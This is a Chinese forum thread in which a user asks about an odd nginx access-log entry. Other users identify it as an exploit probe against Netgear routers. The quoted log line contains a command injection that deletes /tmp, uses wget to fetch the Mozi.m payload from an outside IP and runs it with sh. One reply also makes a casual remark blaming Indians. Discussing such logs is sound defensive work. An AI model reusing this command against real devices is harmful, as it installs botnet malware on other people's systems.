nginx 莫名奇妙的日志，请大家分析一下。

调查员 · 2024-9-8 12:25:17

系统是刚装几天的，就装了 nginx 反代一个docker容器，不是80端口

但是nginx就老发现一些奇怪的日志。

比如下面这个。居然还有 “rm+-rf” 这种命令

117.253.56.151 - - [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=
rm+-rf
+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"

larry · 2024-9-8 12:44:00

调查员发表于 2024-9-8 12:28

不会吧，用访问不存在网页的方式，也能试漏洞？
他不访问怎么知道不存在?

loverhoc · 2024-9-8 12:28:00

别人在试漏洞，执行命令

调查员 · 2024-9-8 12:26:42

loverhoc 发表于 2024-9-8 12:26

别人在试漏洞，执行命令
不会吧，用访问不存在网页的方式，也能试漏洞？

wps · 2024-9-8 12:28:10

这是一个针对路由器的漏洞CNNVD-201306-024

调查员 · 2024-9-8 12:26:00

wps 发表于 2024-9-8 12:30

这是一个针对路由器的漏洞CNNVD-201306-024
看来大家的路由器，80端口真的不要轻易打开。

调查员 · 2024-9-8 12:30:17

印度人在干坏事。

icon · 2024-9-8 12:31:26

看这些你不是不是觉得太无聊了？

		立即注册	自动登录	找回密码
密码			立即注册